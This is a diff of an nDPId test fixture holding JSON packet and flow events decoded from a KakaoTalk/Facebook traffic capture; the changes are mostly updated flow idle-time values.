+00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -88,150 +88,150 @@ 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"thread_ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} 